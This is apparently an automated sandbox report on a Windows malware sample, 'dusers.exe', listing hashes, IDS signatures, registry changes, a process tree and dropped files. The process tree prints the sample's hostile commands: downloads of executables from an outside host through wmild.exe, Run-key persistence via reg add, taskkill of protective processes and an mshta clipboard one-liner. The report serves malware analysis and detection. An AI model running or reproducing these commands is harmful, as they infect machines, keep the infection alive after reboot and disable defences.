Analysis
-
max time kernel
118s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 05:23
Static task
static1
Behavioral task
behavioral1
Sample
dusers.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dusers.exe
Resource
win10v2004-20220414-en
General
-
Target
dusers.exe
-
Size
207KB
-
MD5
80adc9e5666a4b94fe1637f92d0611b0
-
SHA1
478bb364184d882005d0503c91a9929d81e89765
-
SHA256
eb9a70ac0d1f7c413f10f5308bda81e1da5a9b5bfd2ab7c8d89232eada71c143
-
SHA512
f7eac083f93f5022d8a580303a16c1e12532f6c0dc89e338eb7585d5233c52f39fa7b3e06c06511e6dc68e398151be30074346e66eaccb972f1c497a893d88de
Malware Config
Extracted
C:\Users\Admin\AppData\Roaming\Macromedia\index.html
Signatures
-
suricata: ET MALWARE BePush/Kilim payload retrieval
suricata: ET MALWARE BePush/Kilim payload retrieval
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Executes dropped EXE 7 IoCs
Processes:
Users.exewmild.exewmild.exewmild.exewmild.exewmild.exewmild.exepid process 4948 Users.exe 4724 wmild.exe 4240 wmild.exe 1008 wmild.exe 4728 wmild.exe 1768 wmild.exe 1416 wmild.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Users.exe upx C:\Users\Admin\AppData\Local\Temp\Users.exe upx -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
dusers.exeUsers.execmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation dusers.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation Users.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\microsoft\windows\currentversion\run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2028 taskkill.exe 3976 taskkill.exe 4424 taskkill.exe 4692 taskkill.exe 2764 taskkill.exe -
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe -
Modifies registry class 36 IoCs
Processes:
explorer.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5600310000000000b654203b1000526f616d696e6700400009000400efbe8f54090ab654203b2e00000098e101000000010000000000000000000000000000007c3d920052006f0061006d0069006e006700000016000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000008f54090a1100557365727300640009000400efbe874f7748b6541c3b2e000000c70500000000010000000000000000003a000000000034672c0155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000008f54090a12004170704461746100400009000400efbe8f54090ab6541c3b2e00000097e10100000001000000000000000000000000000000d4050b014100700070004400610074006100000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5e00310000000000b654213b10004d4143524f4d7e310000460009000400efbeb654203bb654213b2e0000002c2e0200000006000000000000000000000000000000b7158b004d006100630072006f006d006500640069006100000018000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000008f541d19100041646d696e003c0009000400efbe8f54090ab6541c3b2e0000008ce10100000001000000000000000000000000000000a474c000410064006d0069006e00000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings explorer.exe -
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exepid process 3524 reg.exe 4532 reg.exe 912 reg.exe 3872 reg.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 1600 PING.EXE 440 PING.EXE 1460 PING.EXE 5116 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 444 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
explorer.exepid process 444 explorer.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 3976 taskkill.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeDebugPrivilege 4692 taskkill.exe Token: SeDebugPrivilege 2764 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
explorer.exepid process 444 explorer.exe 444 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dusers.execmd.exeUsers.execmd.exedescription pid process target process PID 1388 wrote to memory of 4440 1388 dusers.exe cmd.exe PID 1388 wrote to memory of 4440 1388 dusers.exe cmd.exe PID 1388 wrote to memory of 4440 1388 dusers.exe cmd.exe PID 4440 wrote to memory of 4948 4440 cmd.exe Users.exe PID 4440 wrote to memory of 4948 4440 cmd.exe Users.exe PID 4440 wrote to memory of 4948 4440 cmd.exe Users.exe PID 4440 wrote to memory of 1600 4440 cmd.exe PING.EXE PID 4440 wrote to memory of 1600 4440 cmd.exe PING.EXE PID 4440 wrote to memory of 1600 4440 cmd.exe PING.EXE PID 4948 wrote to memory of 1100 4948 Users.exe cmd.exe PID 4948 wrote to memory of 1100 4948 Users.exe cmd.exe PID 4948 wrote to memory of 1100 4948 Users.exe cmd.exe PID 1100 wrote to memory of 3680 1100 cmd.exe chcp.com PID 1100 wrote to memory of 3680 1100 cmd.exe chcp.com PID 1100 wrote to memory of 3680 1100 cmd.exe chcp.com PID 1100 wrote to memory of 440 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 440 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 440 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 4724 1100 cmd.exe wmild.exe PID 1100 wrote to memory of 4724 1100 cmd.exe wmild.exe PID 1100 wrote to memory of 4724 1100 cmd.exe wmild.exe PID 1100 wrote to memory of 4240 1100 cmd.exe wmild.exe PID 1100 wrote to memory of 4240 1100 cmd.exe wmild.exe PID 1100 wrote to memory of 4240 1100 cmd.exe wmild.exe PID 4440 wrote to memory of 4140 4440 cmd.exe explorer.exe PID 4440 wrote to memory of 4140 4440 cmd.exe explorer.exe PID 4440 wrote to memory of 4140 4440 cmd.exe explorer.exe PID 1100 wrote to memory of 4540 1100 cmd.exe reg.exe PID 1100 wrote to memory of 4540 1100 cmd.exe reg.exe PID 1100 wrote to memory of 4540 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1460 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 1460 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 1460 1100 cmd.exe PING.EXE PID 1100 wrote to memory of 3524 1100 cmd.exe reg.exe PID 1100 wrote to memory of 3524 1100 cmd.exe reg.exe PID 1100 wrote to memory of 3524 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1868 1100 cmd.exe find.exe PID 1100 wrote to memory of 1868 1100 cmd.exe find.exe PID 1100 wrote to memory of 1868 1100 cmd.exe find.exe PID 1100 wrote to memory of 1928 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1928 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1928 1100 cmd.exe reg.exe PID 1100 wrote to memory of 2028 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2028 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2028 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 3976 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 3976 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 3976 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4424 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4424 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4424 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4692 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4692 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4692 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2764 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2764 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2764 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 4532 1100 cmd.exe reg.exe PID 1100 wrote to memory of 4532 1100 cmd.exe reg.exe PID 1100 wrote to memory of 4532 1100 cmd.exe reg.exe PID 1100 wrote to memory of 912 1100 cmd.exe reg.exe PID 1100 wrote to memory of 912 1100 cmd.exe reg.exe PID 1100 wrote to memory of 912 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1008 1100 cmd.exe wmild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dusers.exe"C:\Users\Admin\AppData\Local\Temp\dusers.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\move.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Users.exeusers.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comCHCP 12515⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/app.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 65⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exeREG QUERY hkcu\software\microsoft\windows\currentversion5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\find.exefind "svr.vbs"5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- Modifies registry key
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbs"5⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:clipboardData.setData('text','5G#JBNGAJAT2tQ^@I@3PJX#)$JHZZTCE');close();"6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f5⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/raauser.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/amsql.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/prochack.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\JetSwap /f5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\Macromedia3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Users.exeFilesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
C:\Users\Admin\AppData\Local\Temp\Users.exeFilesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
C:\Users\Admin\AppData\Local\Temp\move.batFilesize
156B
MD5cfa0da234e0434f0a9b092989956227e
SHA1138abe1853d92bca4869b481087f627dd557229f
SHA25618d5ef0656e401c842a0eb28ff3bc1e46887e7631eea747c6ae773538c13ed40
SHA51295da985ab1ea9ab1ab264b7b799a19e784dcc15e2369a771b49f31dbfd1649a9940ad241c7e89ea4e0d1b96ed8e91ba48ef816431731218fffcad03972909f93
-
C:\Users\Admin\AppData\Roaming\Macromedia\SER.batFilesize
2KB
MD53e4d4cb6c7e82472a7ff63d486bb0566
SHA14b4f7012671f29728065320284ef1b1302a43f78
SHA25627ed1a433e8c6053b348fa5b00c2bfcfd8e5d2d72ca47b496b74d26af0c36532
SHA512d1798d87f09c25f0609a08007ed832a0402f964c570b96f8906b0295b41ac4ce0132c34b5206c8dfc3f60e911bb4b4d2693829354414aefae201869c296e1ee5
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5d02b684399be7b3e3db6981b5b3559c5
SHA1d75aef66321fda5e8b6f33171706552e5edaf155
SHA256278c7bc4c25ceda373ede035d5afcf826d6ef1a1401aa4fc828373bb58fc146b
SHA512abb227b47b387957c891a3002f1d6ec9cd7bbd437fb89b1aa8791f73d84d1fdae70d9567e85662abeefcfa752ee27f69406d9659316b28846099529a5d3b7f4b
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD55456345dd00e29df0d14178da5ecc8a4
SHA1762a3fffa5a588e841fadcb2b792133c3eeead2b
SHA2568ad15a91017a233f8f2ec0c134feb77dad6b450872f44d085afb83b56dfae96d
SHA5126d7ee92637f3480a51caa2aa1304e8b7fe00aa488b96c37225dfab116291b22cafb6d9e2af1bab1694f6b9f8c2e0ac8ee17859b06abc3820827cace3ed53184b
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5c88f54c33c84d7a16e5d8cbbdea17aed
SHA1073fb38301287c2f379abe597365220bbe6f4a98
SHA2563a3f8e1b0c106d83fb8bd71da1c97a4cd787fd35f2b1c56fbd5118dd2e8cc763
SHA51262f8712c9b9d20a2052f1ff39457d15020e3ab7b3e10f890ce1566ad44dbbe695ed7705f22ad688471711f278437caf0953874ddcff0a48bec8fd910eb85ef58
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5e628dc0dfd428cf2326d86f1a397cb73
SHA192668d1f9cdf4d628b681045015b35a7d0add604
SHA256fb2753fb3ba170cf3108642300d510e2745c935e923f9c13804b031bfd0b9058
SHA512aee3488b15010eee16f56a0d0623d43e8cba22204ec14cda98e42e27824757eb32eaf1f3eacfc1e079d7c7334378812571ae9de11228f803b596d2916e847bc4
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5585abf49e049998a1a396d77acf3e9af
SHA11182de5f53245d7d8a418a63b442a92ce8e4c9f0
SHA256ba3af107595dddd669e2897ff3c2e6c2e37a464d02b2e9f96cb25ec268ba5c8f
SHA512a6dcc0abd04929bd50bcc36ceaa2311e6a39c83a68dcaf442403939a1b4c061f19cde91bbb0297e15bf9eb78e8803ddfab044bf97a6edce82621f86d4090b403
-
C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbsFilesize
180B
MD501c573bf7073b7a63bab7d231578c9f0
SHA142a3982701f3c7d90ac8ea2350a0540a4477eaa7
SHA256de9f70f7e727f91adcb411507a685c3eee220e06b440ee69d7cfde62ef0809ad
SHA512fce42b5fed68bbe3c3105395265fde3413d1ccb9419a9983d88b2f0f606f0fb34853580278e95087c8a6197fe4a97fc7c037ef0e6351f594add3808964d26df0
-
C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbsFilesize
142B
MD568ef63c560cb92331c87ee8d7d66be5f
SHA17a3a02a84f759ea3df53ed841189a51085e4f012
SHA2566244a594ab0706c888339de2442ec9a0c96ea76e10fd43e09be5747186e9e238
SHA51255535e2bceba6dceccfd41bb97259782a3adeacda16166eff719842cd210c238b43a114ddc604a2ad442521451ff813e6b3d7d03777f6c099daffd33bbfd037d
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
